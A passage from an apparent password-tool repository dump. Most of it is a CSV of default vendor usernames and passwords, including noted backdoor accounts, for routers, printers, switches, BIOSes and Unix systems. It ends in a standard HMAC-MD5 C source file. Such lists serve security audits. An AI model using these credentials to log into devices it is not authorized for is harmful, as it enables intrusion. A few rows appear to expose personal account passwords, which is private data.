l,fal,,,\nunix,Generic,,User,fax,,,,\nunix,Generic,,User,fax,fax,,,\nunix,Generic,,User,ftp,,,,\nunix,Generic,,User,ftp,ftp,,,\nunix,Generic,,User,games,,,,\nunix,Generic,,User,games,games,,,\nunix,Generic,,User,gopher,gopher,,,\nunix,Generic,,User,gropher,,,,\nunix,Generic,,User,guest,,,,\nunix,Generic,,User,guest,guest,,,\nunix,Generic,,User,guest,guestgue,,,\nunix,Generic,,User,halt,,,,\nunix,Generic,,User,halt,halt,,,\nunix,Generic,,User,informix,informix,,,\nunix,Generic,,User,lp,,,,\nunix,Generic,,User,lp,bin,,,\nunix,Generic,,User,lp,lineprin,,,\nunix,Generic,,User,lp,lp,,,\nunix,Generic,,User,lpadm,lpadm,,,\nunix,Generic,,User,lpadmin,lpadmin,,,\nunix,Generic,,User,lynx,,,,\nunix,Generic,,User,lynx,lynx,,,\nunix,Generic,,User,mail,,,,\nunix,Generic,,User,mail,mail,,,\nunix,Generic,,User,man,,,,\nunix,Generic,,User,man,man,,,\nunix,Generic,,User,me,,,,\nunix,Generic,,User,me,me,,,\nunix,Generic,,User,news,,,,\nunix,Generic,,User,news,news,,,\nunix,Generic,,User,nobody,,,,\nunix,Generic,,User,nobody,nobody,,,\nunix,Generic,,User,nuucp,,,,\nunix,Generic,,User,operator,,,,\nunix,Generic,,User,operator,operator,,,\nunix,Generic,,User,oracle,,,,\nunix,Generic,,User,postmaster,,,,\nunix,Generic,,User,postmaster,postmast,,,\nunix,Generic,,User,powerdown,powerdown,,,\nunix,Generic,,User,rje,rje,,,\nunix,Generic,,User,shu|own,,,,\nunix,Generic,,User,shu|own,shu|own,,,\nunix,Generic,,User,sync,,,,\nunix,Generic,,User,sync,sync,,,\nunix,Generic,,User,trouble,trouble,,,\nunix,Generic,,User,umountfs,umountfs,,,\nunix,Generic,,User,umountfsys,umountfsys,,,\nunix,Generic,,User,umountsys,umountsys,,,\nunix,Generic,,User,unix,unix,,,\nunix,Generic,,User,user,user,,,\nunix,Generic,,User,uucp,uucp,,,\nunix,Generic,,User,uucpadm,uucpadm,,,\nunix,Generic,,User,web,,,,\nunix,Generic,,User,web,web,,,\nunix,Generic,,User,webmaster,,,,\nunix,Generic,,User,webmaster,webmaster,,,\nunix,Generic,,User,www,,,,\nunix,Generic,,User,www,www,,,\nunix,Generic,HP-UX,Multi,root,hp,Admin,,\nunix,Generic,early versions,console or telnet,root,gnomes,Admin,early backdoor password that likely is no longer in use anywhere except by nostalgic old-school admins running much newer systems,\nunix,UNIX,,,setup,,,,\nunix,Unix,,,service,smile,,,\nunknown,POCSAG Radio Paging,,2.05,,password,,,\nunknown,System 88,,,operator,operator,,,\nunknown,System 88,,,overseer,overseer,,,\nunknown,System 88,,,test,test,,,\nus robotics,USR8000,,1.23 / 1.25,root,admin,,,\nus robotics,USR8000,,Admin,root,admin,,,\nus robotics,USR8550,,3.0.5,Any,12345,,,\nusrobotics,805451,805451,,usr54321,usr54321,full,access,\nusrobotics,ADSL Ethernet Modem,,HTTP,,12345,Admin,,\nusrobotics,SureConnect 9003 ADSL Ethernet/USB Router,,Multi,root,12345,Admin,,\nusrobotics,SureConnect 9105 ADSL 4-Port Router,,HTTP,admin,admin,Admin,,\nusrobotics,SureConnect ADSL ,SureConnect ADSL ,Telnet,support,support,User,works after 3rd login trial,\nusrobotics,TOTALswitch,,,,amber,,,\nusrobotics,TOTALswitch,,,,amber,,Any,\nusrobotics,USR5450,,,admin,,Admin,,\nusrobotics,USR8000,1.23 / 1.25,Multi,root,admin,Admin,DSL-Router. Web-Login always uses user root,\nusrobotics,USR8054 Router,,,admin,,,,\nusrobotics,USR8550,,Any,Any,12345,,,\nusrobotics,USR8550,3.0.5,Multi,Any,12345,Any,Best Modem,\nusrobotics,Wireless ADSL Router,,,admin,admin,,,\nusrobotics,adsl gateway wireless router,,wireless router,support,support,super user access,I find it on a manual,\nut,Lexar PBX Switch,,,lexar,,,,\nutlexar,Telephone Switches,,,DESIGNED_BY_IC_KF,,Backdoor,,\nutlexar,Telephone Switches,,,lexar,,maintenance default,,\nutstar,UT300R,,Multi,admin,utstar,root,,\nutstar,UT300R,,root,admin,utstar,,,\nutstarcom,B-NAS B-RAS,,1000,dbase,dbase,,,\nutstarcom,B-NAS B-RAS,,1000,field,field,,,\nutstarcom,B-NAS B-RAS,,1000,guru,*3noguru,,,\nutstarcom,B-NAS B-RAS,,1000,snmp,snmp,,,\nutstarcom,B-NAS,B-RAS,1000,,dbase,dbase,,\nutstarcom,B-NAS,B-RAS,1000,,field,field,,\nutstarcom,B-NAS,B-RAS,1000,,guru,*3noguru,,\nutstarcom,B-NAS,B-RAS,1000,,snmp,snmp,,\nvasco,VACMAN Middleware,2.x,Multi,admin,,Admin,strong authentication server,\nvbricksystems,Multiple,,,admin,admin,,,\nveenman,Linium C353,all versions,console and IP,,12345678,admin,,\nvendor,Product,Revision,Protocol,User,Password,Access,Notes,\nvendor,system,,verified,password,level,,,\nvendor,system,,version,login,password,,,\nveramark,eCAS,,Administrative,admin,password,,,\nverifone,Verifone Junior,,,,166816,,,\nverifone,Verifone Junior,,2.05,,166816,,,\nverifone,Verifone Junior,2.05,,,166816,,,\nverilink,NE6100-4 NetEngine,IAD 3.4.8,Telnet,,,Guest,,\nveritas,Cluster Server,,,admin,password,,,\nveritas,Cluster Server,,http,admin,password,Admin,,\nverity,Ultraseek,,http,admin,admin,Admin,,\nverizon,9100EM,,,admin,password,,,\nverizon,9100VM,,,admin,password,,,\nverizon,MI424WR,,,admin,password,,,\nvertex,VERTEX 1501,,5.05,root,vertex25,,,\nvertex,Vertex 1501,5.05,,root,vertex25,Admin,,\nvextrec technology,PC BIOS,,,,Vextrex,,,\nvextrectechnology,PC BIOS,,Console,,Vextrex,,,\nvienuke,VieBoard,,2.6,admin,admin,,,\nvienuke,VieBoard,2.6,,admin,admin,Administrator,,\nvina technologies,ConnectReach,,,,,,,\nvinatechnologies,ConnectReach,,,,,,3.6.2,\nvirginmedia,Netgear Superhub,,,admin,changeme,,,\nvirtual programming,VP-ASP Shopping Cart,,5.0,admin,admin,,,\nvirtual programming,VP-ASP Shopping Cart,,5.0,vpasp,vpasp,,,\nvirtualprogramming,VP-ASP Shopping Cart,5,,admin,admin,Admin,,\nvirtualprogramming,VP-ASP Shopping Cart,5,,vpasp,vpasp,Admin,,\nvirtualprogramming,VP-ASP Shopping Cart,5.0,,admin,admin,Admin,,\nvirtualprogramming,VP-ASP Shopping Cart,5.0,,vpasp,vpasp,Admin,,\nvisa vap,VAP,,,root,QNX,,,\nvisa,Visa VAP,,Telnet/modem,root,QNX,root,,\nvisualnetworks,Visual Uptime T1 CSU/DSU,1,Console,admin,visual,Admin,,\nvobis,PC BIOS,,,,merlin,,,\nvobis,PC BIOS,,Console,,merlin,,,\nvoicegenietechnologies,VoiceGenie,,,pw,pw,Admin,,\nvoiceobjects,VoiceObjects,,,voadmin,manager,,,\nvonage,Cisco ATA-186,,HTTP,,,,,\nvonage,D-Link VTA,,HTTP,user,user,,,\nvonage,D-Link VWR,,HTTP,user,user,,,\nvonage,Linksys PAP2/PAP2V2,,HTTP,admin,admin,,,\nvonage,Linksys RT31P2,,HTTP,admin,admin,,,\nvonage,Linksys RTP300,,HTTP,admin,admin,,,\nvonage,Linksys WRT54GP2,,HTTP,admin,admin,,,\nvonage,Linksys WRTP54G,,HTTP,admin,admin,,,\nvonage,Motorola VT1005,,HTTP,,,,,\nvonage,Motorola VT2142,,HTTP,router,router,,,\nvonage,Motorola VT2442,,HTTP,router,router,,,\nvonage,Motorola VT2542,,HTTP,router,router,,,\nvonage,Uniden UIP1869V,,HTTP,admin,admin,,,\nvonage,V-Tech IP8100,,HTTP,VTech,VTech,,,\nvonage,VDV21-VD,,HTTP,router,router,,,\nvpasp,VP-ASP Shopping Cart,,,admin,admin,,,\nvpasp,VP-ASP Shopping Cart,,,vpasp,vpasp,,,\nvxworks,misc,,Multi,admin,admin,Admin,,\nvxworks,misc,,Multi,guest,guest,Guest,,\nwaav,X2,,Admin,admin,waav,,,\nwanadoo,Livebox,,Multi,admin,admin,Admin,,\nwanco,NTCIP Message Sign Software,,,,ABCD,,,\nwanco,NTCIP Message Sign Software,,,,Guest,,,\nwanco,NTCIP Message Sign Software,,,,NTCIP,,,\nwanco,NTCIP Message Sign Software,,,,Public,,,\nwang,Wang,,Multi,CSG,SESAME,Admin,,\nwarracorp,janon,,guest,pepino,pepino,,,\nwarracorp,janon,2.1,HTTP,pepino,pepino,guest,,\nwatch guard,firebox 1000,,,admin,,,,\nwatch guard,firebox 1000,,Admin,admin,,,,\nwatchguard,FireBox,,,,wg,,,\nwatchguard,SOHO and SOHO6,all versions,FTP,user,pass,Admin,works only from the inside LAN,\nwatchguard,XTM,,,admin,readwrite,,,\nwatchguard,XTM,,,status,readonly,,,\nwatchguard,firebox 1000,,Multi,admin,,Admin,,\nweb wiz,Forums,,7.x,Administrator,letmein,,,\nwebexcel,AL-2108,,192.168.1.254,admin,admin,Admin,,\nwebexcel,AL-2112,,192.168.1.254,admin,admin,Admin,,\nwebexcel,PT-3808,,10.0.0.2,admin,epicrouter,Admin,,\nwebexcel,PT-3812,,10.0.0.2,admin,epicrouter,Admin,,\nweblogic,weblogic,,yes,system,weblogic,,,\nwebmin,Webmin,,,admin,,,default linux install,\nwebmin,Webmin,,,admin,hp.com,,,\nwebmin,Webmin,,http,admin,hp.com,Admin,,\nwebmin,Webmin,,http,admin,hp.com,Admin,default HP-UX install,\nwebramp,410i etc...,,,wradmin,trancell,,,\nwebramp,Unknown,,,wradmin,trancell,,,\nwebwiz,Forums,7.x,http,Administrator,letmein,Admin,,\nwestell,2200,,Multi,admin,password,Admin,,\nwestell,Versalink 2200,,,admin,password,,,\nwestell,Versalink 327,,,admin,password,,,\nwestell,Versalink 327,,Multi,admin,,Admin,,\nwestell,Versalink 6100,,,admin,password,,,\nwestell,Wang,,Multi,CSG,SESAME,Admin,,\nwestell,Wirespeed wireless router,,Multi,admin,sysAdmin,Admin,,\nwestell,Wirespeed,,Multi,admin,password,Admin,,\nwestell,Wirespeed,,Multi,admin,sysAdmin,Admin,,\nwim bervoets,WIMBIOSnbsp BIOS,,,,Compleri,,,\nwim bervoets,WIMBIOSnbsp BIOS,,Admin,,Compleri,,,\nwimbervoets,WIMBIOSnbsp BIOS,,Console,,Compleri,Admin,,\nwinwork,iso sistemi,,,operator,,,,\nwinwork,iso sistemi,,Admin,operator,,,,\nwireless inc.,WaveNet,,,root,rootpass,,,\nwirelessinc,WaveNet 2458,,,root,rootpass,,,\nworldclient,AdminServer,,,WebAdmin,Admin,,,\nworldclient,AdminServer,,HTTP:2001,WebAdmin,Admin,WorldClient,,\nworldclient,AdminServer,,WorldClient,WebAdmin,Admin,,,\nwww.soft.vip600.com,123,,,anonymous,anonymous,,,\nwwwboard,WWWADMIN.PL,,,WebAdmin,WebBoard,,,\nwwwboard,WWWADMIN.PL,,Admin,WebAdmin,WebBoard,,,\nwwwboard,WWWADMIN.PL,,HTTP,WebAdmin,WebBoard,Admin,,\nwyse,Thin Clients,Windows Embedded Standard 2009,Console,administrator,Wyse#123,Admin access to console,,\nwyse,V90 series thin client,all,BIOS,,Fireport,BIOS,,\nwyse,V90,,VNC,,Wyse,,,\nwyse,WT 1125 SE,,,user,user,,,\nwyse,WT9235LE,XPe (XP embedded),console login,Administrator,Administrator,local Admin,(case sensitive),\nwyse,Winterm 3150,,VNC,,password,Admin,,\nwyse,Winterm,,5440XL,VNC,winterm,,,\nwyse,Winterm,,5440XL,root,wyse,,,\nwyse,Winterm,,Admin,root,wyse,,,\nwyse,Winterm,,VNC,VNC,winterm,,,\nwyse,Winterm,5440XL,Console,root,wyse,Admin,,\nwyse,Winterm,5440XL,VNC,VNC,winterm,VNC,,\nwyse,Winterm,9455XL,BIOS,,Fireport,BIOS,Case Sensitive,\nwyse,rapport,4.4,FTP,rapport,r@p8p0r+,ftp logon to controlling ftp server.,,\nwyse,v90le,,console,Administrator,Administrator,,,\nwyse,v90le,unknown,console,Administrator,Administrator,,,\nwyse,winterm,,Multi,root,,Admin,,\nx-micro,WLAN 11b Broadband Router,,,1502,1502,,,\nx-micro,WLAN 11b Broadband Router,,,super,super,,,\nxavi,7000-ABA-ST1,,Console,,,Admin,,\nxavi,7001,,Console,,,Admin,,\nxavi,X7722r,,,admin,admin,,,\nxavi,X7722r,,192.168.1.1,admin,admin,,,\nxavi,X7722r,all,HTTP,admin,admin,192.168.1.1,,\nxerox,4110,,http://192.168.0.1,11111,x-admin,root,,\nxerox,61xx,All,DocuSP,Administrator,administ,,,\nxerox,7232,,,11111,x-admin,,,\nxerox,77xx,,http,admin,1111,,,\nxerox,ApeosIII 4300,,HTTP,11111,x-admin,Admin,,\nxerox,ColorQube 9201,,console,local IP address,admin,1111,,\nxerox,DocuCentre-II C6500,all versions,http,11111,x-admin,Admin,,\nxerox,DocuCentre-II C6500,all versions,http,11111,x-admin,Admin,source http://www.support.xerox.com/SRVS/CGI-BIN/WEBCGI.EXE/,\nxerox,DocuColor 1632,,console,,11111,Admin,,\nxerox,DocuColor 1632,,http,admin,admin,Admin,,\nxerox,DocuColor,,1632,,11111,,,\nxerox,DocuColor,,1632,admin,admin,,,\nxerox,Docucentre-IV 3065,,http,11111,x-admin,Admin,Account lockout due to too many incorrect login attempts can be cleared by rebooting ther machine (Power switch on right side of main output tray),\nxerox,Document Centre 405,-,HTTP,admin,admin,Admin,,\nxerox,Document Centre 425,,HTTP,admin,,Admin,,\nxerox,Document Centre 425,,HTTP,admin,22222,Admin,works for access panel 2,\nxerox,Document Centre 432,,,admin,22222,,,\nxerox,Document Centre 432,,http,admin,22222,Admin,,\nxerox,Document Centre c320,,HTTP,admin,admin,,Default machine admin password: 11111,\nxerox,Document Centre,,,NSA,nsa,,,\nxerox,Docuprint 340a,,,admin,x-admin,Web interface login,,\nxerox,Fiery,,,Administrator,Fiery.1,,,\nxerox,Fiery,,HTTP,Administrator,Fiery.1,,,\nxerox,Fiery,2,remove desktop,Administrator,fiery.1,,,\nxerox,Fiery,2.0,remove desktop,Administrator,fiery.1,,,\nxerox,M24,,LAN,admin,admin,,,\nxerox,Multi Function Equipment,,,admin,2222,,,\nxerox,Multi Function Equipment,,Admin,admin,2222,,,\nxerox,Multi Function Equipment,,Multi,admin,2222,Admin,combo fax/scanner/printer with network access,\nxerox,Phaser 3600,,,admin,1111,,,\nxerox,Phaser,3600,Intranet / network,admin,1111,Administrator access,,\nxerox,Work Center Pro C2128,,http,admin,1111,,,\nxerox,WorkCenter 2640,,http://,admin,1111,,,\nxerox,WorkCenter Pro 428,,,admin,admin,,,\nxerox,WorkCenter Pro 428,,Admin,admin,admin,,,\nxerox,WorkCentre 265,v1,http,admin,1111,,,\nxerox,WorkCentre 3325,,IP address,admin,1111,Admin,,\nxerox,WorkCentre 5230,all,web,11111,x-admin,,,\nxerox,WorkCentre 5675,All,Console, HTTP,admin,1111,,\nxerox,WorkCentre 5675,All,Console,HTTP,admin,1111,Admin access to the console and web interfaces,\nxerox,WorkCentre 57xx,,http,admin,1111,,,\nxerox,WorkCentre 7245,,http,11111,x-admin,Admin,,\nxerox,WorkCentre 7328,,http,11111,x-admin,,,\nxerox,WorkCentre 7335,,,11111,x-admin,,,\nxerox,WorkCentre 7345,,,11111,x-admin,,,\nxerox,WorkCentre 7346,,HTTP,admin,1111,Administrative Access,,\nxerox,WorkCentre 7425,,http or console,admin,1111,,,\nxerox,WorkCentre 7530,All version,Http,admin,1111,,,\nxerox,WorkCentre 7665,,,admin,1111,,,\nxerox,WorkCentre M118,,shared 'admintool' folder,admin,x-admin,admin,\\192.168.0.1admintool,\nxerox,WorkCentre M118,,shared 'admintool' folder,admin,x-admin,admin,\\\\192.168.0.1\\admintool,\nxerox,WorkCentre M20i,,http,admin,1111,Admin,,\nxerox,WorkCentre PE 120i,,IP address,admin,1111,,,\nxerox,WorkCentre Pro 35,,HTTP,admin,1111,Admin,,\nxerox,WorkCentre Pro 35,all,HTTP,admin,1111,admin,WorkCentre Pro 35,\nxerox,WorkCentre Pro 420,,,admin,sysadm,,,\nxerox,WorkCentre Pro 428,,HTTP,admin,admin,Admin,,\nxerox,WorkCentre Pro 45,,HTTP,admin,1111,Admin,,\nxerox,WorkCentre Pro,,45,admin,1111,,,\nxerox,WorkCentre and DocumentCentre,,,savelogs,crash,,,\nxerox,WorkCentre,7232/7242,http,11111,x-admin,Administrator,,\nxerox,WorkCentre/DocumentCentre,,,savelogs,crash,,,\nxerox,Workcenter 245 Pro,,HTTP,admin,1111,,,\nxerox,Workcentre 7120,All,Http,admin,1111,Admin,,\nxerox,WprkCentre 7845,,,admin,1111,,,\nxerox,work centre,7328,console,,,,,\nxerox,workcentre 5222,,http://,11111,x-admin,,,\nxerox,workcentre 5225A,,,admin,11111,,,\nxerox,workcentre,3220,web,admin,1111,admin,,\nxerox,xerox,,Multi,,admin,Admin,,\nxerox,xerox,,Multi,admin,admin,Admin,,\nxincom,XC-DPG402,,http://192.168.1.1,admin,,Administration,,\nxincom,XC-DPG502,,http://192.168.1.1,admin,,Administration,,\nxincom,XC-DPG503,,http://192.168.1.1,admin,,Administration,,\nxincom,XC-DPG602,,http://192.168.1.1,admin,,Administration,,\nxincom,XC-DPG603,,http://192.168.1.1,admin,,Administration,,\nxirrus,XR-1000H Series,,http://10.0.2.1,admin,admin,Admin,,\nxmicro,WLAN 11b Access Point,1.2.2,Multi,super,super,Admin,,\nxmicro,X-Micro WLAN 11b Broadband Router,1.2.2 1.2.2.3 1.2.2.4 1.6.0.0,Multi,super,super,Admin,From BUGTRAQ,\nxmicro,X-Micro WLAN 11b Broadband Router,1.6.0.1,HTTP,1502,1502,Admin,From BUGTRAQ,\nxylan,Omnistack 1032CF,,,admin,password,,3.2.8,\nxylan,Omnistack 4024,,,admin,password,,3.4.9,\nxylan,Omniswitch,,,admin,switch,,,\nxylan,Omniswitch,,,admin,switch,,3.1.8,\nxylan,Omniswitch,,,diag,switch,,,\nxylan,Omniswitch,,Admin,admin,switch,,,\nxylan,Omniswitch,,Telnet,admin,switch,Admin,,\nxylan,Omniswitch,,Telnet,diag,switch,Admin,,\nxyplex,MX-1600,,,setpriv,system,,,\nxyplex,Routers,,,,system,,,\nxyplex,Routers,,Admin,,system,,,\nxyplex,Routers,,Port 7000,,access,User,,\nxyplex,Routers,,Port 7000,,system,Admin,,\nxyplex,Routers,,User,,access,,,\nxyplex,Terminal Server,,,,access,,,\nxyplex,Terminal Server,,,,system,,,\nxyplex,Terminal Server,,Admin,,system,,,\nxyplex,Terminal Server,,Port 7000,,access,User,,\nxyplex,Terminal Server,,Port 7000,,system,Admin,,\nxyplex,Terminal Server,,User,,access,,,\nxyplex,mx-16xx,,,setpriv,system,,,\nxyplex,switch,3.2,Console,,,Admin,,\nyahoo,mail,yes,Multi,1234567890,bloggs,yes,,\nyahoo,messenger,messenger,Multi,handsome_123_handsome,plsdontguess,password,,\nyahoo,messenger,messenger,Multi,intelligent_guy_priyank,passwordguy,password,,\nyakumo,Routers,,,admin,admin,,,\nyakumo,Routers,,HTTP,admin,admin,Admin,,\nyuxin,YWH10 IP Phone,,http,User,1234,Admin,,\nyuxin,YWH10 IP Phone,,http,User,19750407,Admin,,\nyuxin,YWH100 IP Phone,,http,User,1234,Admin,,\nyuxin,YWH100 IP Phone,,http,User,19750407,Admin,,\nyuxin,YWH200 IP Phone,,http,User,1234,Admin,,\nyuxin,YWH200 IP Phone,,http,User,19750407,Admin,,\nyuxin,YWH300 IP Phone,,http,User,1234,Admin,,\nyuxin,YWH300 IP Phone,,http,User,19750407,Admin,,\nzcom,Wireless,,SNMP,root,admin,Admin,,\nzcom,XG1021 N,,,admin,password,,,\nzebra,10/100 Print Server,,Multi,admin,1234,Admin,,\nzenith,PC BIOS,,,,3098z,,,\nzenith,PC BIOS,,,,Zenith,,,\nzenith,PC BIOS,,Admin,,3098z,,,\nzenith,PC BIOS,,Admin,,Zenith,,,\nzenith,PC BIOS,,Console,,3098z,Admin,,\nzenith,PC BIOS,,Console,,Zenith,Admin,,\nzeos,PC BIOS,,,,zeosx,,,\nzeos,PC BIOS,,Admin,,zeosx,,,\nzeos,PC BIOS,,Console,,zeosx,Admin,,\nzeus,Zeus Admin Server,,4.1r2,admin,,,,\nzeus,Zeus Admin Server,4.1r2,http,admin,,,,\nzoom,ADSL X3,,,admin,zoomadsl,,,\nzoom,ADSL X3,,HTTP,admin,zoomadsl,,,\nzoom,IG-4165,,http://192.168.123.254,,admin,Administration,,\nzoom,ZOOM ADSL Modem,,Console,admin,zoomadsl,Admin,,\nzte,MF30,,192.168.0.1,admin,admin,Admin,,\nzte,MF60,,192.168.0.1,admin,admin,Admin,,\nzte,MF62,,192.168.0.1,Administrator,admin,Admin,,\nzte,all models,all versions,http://192.168.0.1,admin,admin,admin,,\nzxdsl,ZXDSL 831,,,ZXDSL,ZXDSL,,,\nzyxel,641 ADSL,,,,1234,,,\nzyxel,642R,,Admin,,1234,,,\nzyxel,642R,,Telnet,,1234,Admin,,\nzyxel,660,,,1234,1234,,,\nzyxel,660R-61C,1.0,http://192.168.1.1/,mikucha,abadaifice,root,abadaifice,\nzyxel,660R-61C,401373,http://192.168.1.1,admin,1234,Admin,,\nzyxel,660R-61C,401373,http://192.168.1.1,admin,1234,Admin,abadaifice,\nzyxel,ADSL routers,All ZyNOS Firmwares,Multi,admin,1234,Admin,this is default for dsl routers provided by the ISP firstmile.no,\nzyxel,Cable modems,,http:192.168.1.1:8080,webadmin,1234,user,desprogamado,\nzyxel,G-1000,,http://192.168.1.2,,1234,Administration,,\nzyxel,G-2000 Plus,,http://192.168.1.1,,1234,Administration,,\nzyxel,G-3000H,,http://192.168.1.2,,1234,Administration,,\nzyxel,G-560,,http://192.168.1.2,,1234,Administration,,\nzyxel,G-570S,,http://192.168.1.2,,1234,Administration,,\nzyxel,Generic Routers,,,,1234,,,\nzyxel,Generic Routers,,Admin,,1234,,,\nzyxel,Generic Routers,,Telnet,,1234,Admin,,\nzyxel,Generic,,Admin,Admin,atc456,,,\nzyxel,ISDN Router Prestige 100IH,,,,1234,,,\nzyxel,ISDN-Router Prestige 1000,,,,1234,,,\nzyxel,P-2302R,,192.168.10.1,,1234,Admin,,\nzyxel,P-2302RL,,192.168.1.1,,1234,Admin,,\nzyxel,P-2602H,,,,1234,Admin,,\nzyxel,P-2602HWL,,192.168.1.1,admin,1234,Admin,,\nzyxel,P-2602HWL-D1A,,192.168.1.1,admin,1234,Admin,,\nzyxel,P-320W,,,user11,@12345,,,\nzyxel,P-330 W EE,4312,,admin,1234,,,\nzyxel,P-623,,http://192.168.1.1,admin,1234,Administration,,\nzyxel,P-645,,http://192.168.1.1,admin,1234,Administration,,\nzyxel,P-650,,http://192.168.1.1,admin,1234,Administration,,\nzyxel,P-660H,T1v3s,192.168.1.1,admin,admin,admin,,\nzyxel,P-660H-T1 v2,V3.40,192.168.1.1,admin,admin,password,,\nzyxel,P-660HW,,http://192.168.1.1,,1234,Administration,,\nzyxel,P-660HW,t1,http://192.168.1.1,,,admin,,\nzyxel,P-660R,,http://192.168.1.1,admin,2633170,,,\nzyxel,P-660RU,,http://192.168.1.1,,1234,Administration,,\nzyxel,P-660h-t1 v2,ALL VERSIONS ETC,192.168.1.1,,,,,\nzyxel,P-661H,,192.168.1.1,admin,1234,Admin,,\nzyxel,P-661HW,,192.168.1.1,admin,1234,Admin,,\nzyxel,P-663H-51,,192.168.1.1,admin,1234,Admin,,\nzyxel,P-794M,,http://192.168.1.1,admin,1234,Administration,,\nzyxel,P-861H,,Multi,admin,1234,Web + Telnet,,\nzyxel,P-964APR,,http://192.168.1.1:8080,user,1234,Administration,,\nzyxel,P-964CM,,http://192.168.1.1:8080,user,1234,Administration,,\nzyxel,P-964CR,,http://192.168.1.1:8080,user,1234,Administration,,\nzyxel,P-971M,,http://192.168.1001,webadmin,1234,Administration,,\nzyxel,P-974,,,admin,1234,,,\nzyxel,P861H,,Multi,admin,1234,Web + Telnet,,\nzyxel,P861H,,Web + Telnet,admin,1234,,,\nzyxel,Prestige ,660R-61C,,,1234,,,\nzyxel,Prestige 100IH,,,,1234,,,\nzyxel,Prestige 100IH,,Console,,1234,Admin,,\nzyxel,Prestige 128 modem-router,,,,1234,,any,\nzyxel,Prestige 300 series,,,,1234,,zynos 2.*,\nzyxel,Prestige 643,,,,1234,,,\nzyxel,Prestige 643,,Console,,1234,Admin,,\nzyxel,Prestige 645,,HTTP,admin,1234,Admin,,\nzyxel,Prestige 650,,Multi,1234,1234,Admin,,\nzyxel,Prestige 652HW-31 ADSL Router,,,admin,1234,,,\nzyxel,Prestige 652HW-31 ADSL Router,,HTTP,admin,1234,Admin,http://192.168.1.1,\nzyxel,Prestige 652HW-31,,,admin,1234,,,\nzyxel,Prestige 660H,,192.168.1.1,,1234,Admin,,\nzyxel,Prestige 660HW,,Multi,admin,admin,Admin,,\nzyxel,Prestige 900,,HTTP,webadmin,1234,Admin,192.168.1.1:8080,\nzyxel,Prestige P660HW,,Multi,admin,1234,Admin,,\nzyxel,Prestige,,,,1234,,,\nzyxel,Prestige,,,root,1234,,,\nzyxel,Prestige,,Admin,,1234,,,\nzyxel,Prestige,,Admin,root,1234,,,\nzyxel,Prestige,,FTP,root,1234,Admin,,\nzyxel,Prestige,,HTTP,,1234,Admin,http://192.168.1.1,\nzyxel,Prestige,,Telnet,,1234,Admin,,\nzyxel,Prestige,660R-61C,,,1234,,,\nzyxel,Switch,,Web/Telnet/CLI,admin,1234,,,\nzyxel,Switch,ES-2108-G,Multi,admin,1234,Web/Telnet/CLI,,\nzyxel,VSG1432,Generic,http://192.168.1.254,admin,1234,2012-09-19,,\nzyxel,VSG1432,Telus ADSL,http://192.168.1.254,admin,telus,2012-09-19,,\nzyxel,WAP3205,1.2.,http://192.168.1.2,,1234,wi-fi,,\nzyxel,Windows Vista,P- 2602HWN-D7A,192.168.1.1.,anatoij,1234,1234,,\nzyxel,ZyWALL Series Prestige 660R-61C,,Multi,,admin,Admin,,\nzyxel,ZyWall 2,,HTTP,,,Admin,,\nzyxel,ZyWall 5 UTM,,192.168.1.1,1234,1234,Admin,,\nzyxel,Zywall,,Admin,admin,1234,,,\nzyxel,Zywall,,Multi,admin,1234,Admin,,\nzyxel,keenetic 4g,192.168.1.1:8080,,admin,1234,,,\nzyxel,linux,4,http://192.168.1.1:8080,user,mr37net,root,-,\nzyxel,p-660hw,t1,http://192.168.1.1,,,admin,,\nzyxel,tm6941g,,http://192.168.1.254,admin,abc123,admin,admin,\nzyxel,zyxer,cable moden,http:192.168.1.1:8080,webadmin,1234,user,desprogamado,\n" }, { "path": "hmacmd5.c", "content": "\n/*\n Unix SMB/CIFS implementation.\n HMAC MD5 code for use in NTLMv2\n Copyright (C) Luke Kenneth Casson Leighton 1996-2000\n Copyright (C) Andrew Tridgell 1992-2000\n\n This program is free software; you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation; either version 2 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program; if not, write to the Free Software\n Foundation, Inc.\n\n Free Software Foundation\n 51 Franklin Street, Fifth Floor\n Boston, MA 02110-1335\n USA\n\n Telephone: +1-617-542-5942\n Fax: +1-617-542-2652\n General email: info@fsf.org\n*/\n\n/* taken direct from rfc2104 implementation and modified for suitable use\n * for ntlmv2.\n */\n#ifdef LIBOPENSSL\n\n#include \"hmacmd5.h\"\n#include \n\n#define ZERO_STRUCT(x) memset((char *)&(x), 0, sizeof(x))\n\n/***********************************************************************\n the rfc 2104 version of hmac_md5 initialisation.\n***********************************************************************/\n\nvoid hmac_md5_init_rfc2104(const unsigned char *key, int32_t key_len, HMACMD5Context *ctx) {\n int32_t i;\n unsigned char tk[16];\n\n /* if key is longer than 64 bytes reset it to key=MD5(key) */\n if (key_len > 64) {\n MD5_CTX tctx;\n\n MD5_Init(&tctx);\n MD5_Update(&tctx, (void *)key, key_len);\n MD5_Final(tk, &tctx);\n\n key = tk;\n key_len = 16;\n }\n\n /* start out by storing key in pads */\n ZERO_STRUCT(ctx->k_ipad);\n ZERO_STRUCT(ctx->k_opad);\n memcpy(ctx->k_ipad, key, key_len);\n memcpy(ctx->k_opad, key, key_len);\n\n /* XOR key with ipad and opad values */\n for (i = 0; i < 64; i++) {\n ctx->k_ipad[i] ^= 0x36;\n ctx->k_opad[i] ^= 0x5c;\n }\n\n MD5_Init(&ctx->ctx);\n MD5_Update(&ctx->ctx, ctx->k_ipad, 64);\n}\n\n/***********************************************************************\n the microsoft version of hmac_md5 initialisation.\n***********************************************************************/\n\nvoid hmac_md5_init_limK_to_64(const unsigned char *key, int32_t key_len, HMACMD5Context *ctx) {\n int32_t i;\n\n /* if key is longer than 64 bytes truncate it */\n if (key_len > 64) {\n key_len = 64;\n }\n\n /* start out by storing key in pads */\n ZERO_STRUCT(ctx->k_ipad);\n ZERO_STRUCT(ctx->k_opad);\n memcpy(ctx->k_ipad, key, key_len);\n memcpy(ctx->k_opad, key, key_len);\n\n /* XOR key with ipad and opad values */\n for (i = 0; i < 64; i++) {\n ctx->k_ipad[i] ^= 0x36;\n ctx->k_opad[i] ^= 0x5c;\n }\n\n MD5_Init(&ctx->ctx);\n MD5_Update(&ctx->ctx, ctx->k_ipad, 64);\n}\n\n/***********************************************************************\n update hmac_md5 \"inner\" buffer\n***********************************************************************/\n\nvoid hmac_md5_update(const unsigned char *text, int32_t text_len, 